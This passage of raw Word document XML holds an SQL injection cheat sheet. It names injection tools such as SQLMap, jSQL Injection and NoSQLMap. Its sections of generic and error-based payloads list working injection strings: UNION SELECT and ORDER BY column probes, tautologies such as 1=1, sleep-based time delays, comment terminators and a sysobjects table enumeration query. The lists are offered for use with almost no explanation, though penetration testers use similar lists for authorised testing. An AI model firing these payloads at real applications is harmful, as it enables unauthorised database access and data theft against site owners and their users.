                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>It is a sql injection attack method that can be applied in applications that provide access to databases with voice command. An attacker could pull information from the database by sending sql queries with sound.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69D724D0" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection Vulnerability Scanner Tool's :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC2935"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9" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>SQLMap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – Automatic SQL Injection And Database Takeover Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5DACD"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10" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>jSQL Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – Java Tool For Automatic SQL Database Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97D0BF"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11" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>BBQSQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – A Blind SQL-Injection Exploitation Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A302D44"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12" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>NoSQLMap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – Automated NoSQL Database Pwnage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65456989"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13" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Whitewidow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – SQL Vulnerability Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE92D3"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14" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>DSSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – Damn Small SQLi Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05836B44"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15" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>explo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – Human And Machine Readable Web Vulnerability Testing Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB6D58A"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16" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Blind-Sql-Bitshifting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – Blind SQL-Injection via Bitshifting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2ACDB4"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17" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Leviathan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – Wide Range Mass Audit Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27221935" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00B51AE2">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Blisqy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – Exploit Time-based blind-SQL-injection in HTTP-Headers (MySQL/MariaDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622DBD2D" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Generic SQL Injection Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF46A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380676A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6B035D9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7B29E05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109040E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0916829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3F9B7AF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4AC95FD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2A6DF26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56FA121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5294FC0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3895AC8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610886E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CB0F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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E24D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'1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3828F50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1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164DA12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 = "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B4BA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1 = 1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0702F9C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 = '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1834F72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42FB2F7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'LIKE'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395807C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'=0--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012FFFB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1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971EAD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'x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124A3DE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AND id IS NULL; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4534999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'''''''''''''UNION SELECT '2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF45A6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%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723D1A3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D230F3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r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t>addition, concatenate (or space in url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C629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r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t>(double pipe) concatenate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372FF78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r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t>wildcard attribute indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636DAD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17749A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@variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t>local variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185208D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@@variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t>global variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A63F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B49F39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F12C12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Numeric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D897C3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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E70266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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7DE2A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true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D2B7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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66282A7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1-false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF1518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1-true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2448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1*56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C7CC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-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C014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67943C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52AEED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ORDER BY 1--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A2A2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ORDER BY 2--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D0689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1' ORDER BY 3--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749792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8BA3A7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ORDER BY 1,2--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B61CAE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ORDER BY 1,2,3--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B1304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5959DB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GROUP BY 1,2,--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF1B8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GROUP BY 1,2,3--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F61B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GROUP BY columnnames having 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1935276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735D73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78F0EC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UNION SELECT 1,2,3--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637F84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UNION SELECT sum(columnname ) from tablename --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3BECB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1F61D0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9C44D8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UNION SELECT 1 INTO @,@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE8EB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UNION SELECT 1 INTO @,@,@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716643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1105CD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AND (SELECT * FROM Users) = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC768E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C10E90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AND MID(VERSION(),1,1) = '5';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC8432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0C4FCF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and 1 in (select min(name) from sysobjects where xtype = 'U' and name &gt; '.') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0028983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064810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AB787F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Finding the table name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE9135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196971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92F1B9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Time-Based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F41EEE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,(select * from (select(sleep(10)))a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F76201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%2c(select%20*%20from%20(select(sleep(10)))a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B9802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'0:0:30'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0476065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EDD73C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Comments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B0243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0691F6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r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    Hash comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE7783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w:t>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t>C-style comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB5A6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w:t>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t>SQL comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC7F06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;%00</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t>Nullbyte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E176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r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    Backtick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB493A0" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Generic Error Based Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7990265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1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C6AF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1=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4073F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x=x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AD128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x=y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ACE2C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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84609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1=0#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007AE74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x=x#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0606BDB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x=y#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9278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1=1-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335DD8F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1=0-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3259466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x=x-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFEDD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x=y-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0083F89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3409=3409 AND ('pytW' LIKE 'pytW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E4AE7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 3409=3409 AND ('pytW' LIKE 'pytY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06F85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HAVING 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72A58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HAVING 1=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C45308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HAVING 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563172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HAVING 1=0#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D611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HAVING 1=1-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56032C6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HAVING 1=0-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CABB2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1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B14F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1=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1533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1=1-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141C03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1=0-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276EA9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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6712BE6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1=0#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F78E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1=1 AND '%'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336EA0B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1=0 AND '%'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36197CE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1083=1083 AND (1427=1427</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD988A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7506=9091 AND (5913=5913</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565B52B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1083=1083 AND ('1427=1427</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08821D1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7506=9091 AND ('5913=5913</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2BB9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7300=7300 AND 'pKlZ'='pKlZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38029D1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7300=7300 AND 'pKlZ'='pKlY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5750648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7300=7300 AND ('pKlZ'='pKlZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D673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7300=7300 AND ('pKlZ'='pKlY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE3A9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AS INJECTX WHERE 1=1 AND 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027BA6B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AS INJECTX WHERE 1=1 AND 1=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7F38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AS INJECTX WHERE 1=1 AND 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18075B1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AS INJECTX WHERE 1=1 AND 1=0#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E5D4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AS INJECTX WHERE 1=1 AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8DDB3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AS INJECTX WHERE 1=1 AND 1=0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391FA63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WHERE 1=1 AND 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38990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WHERE 1=1 AND 1=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5242A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WHERE 1=1 AND 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD30C1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WHERE 1=1 AND 1=0#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83433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WHERE 1=1 AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB5863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WHERE 1=1 AND 1=0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBD16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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCAD4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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D20C00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3-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C74C0B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4-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1611E7F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5-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FD1DD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6-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E878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7-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52891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8-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C61BD3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9-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA42DD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10-- </w:t>
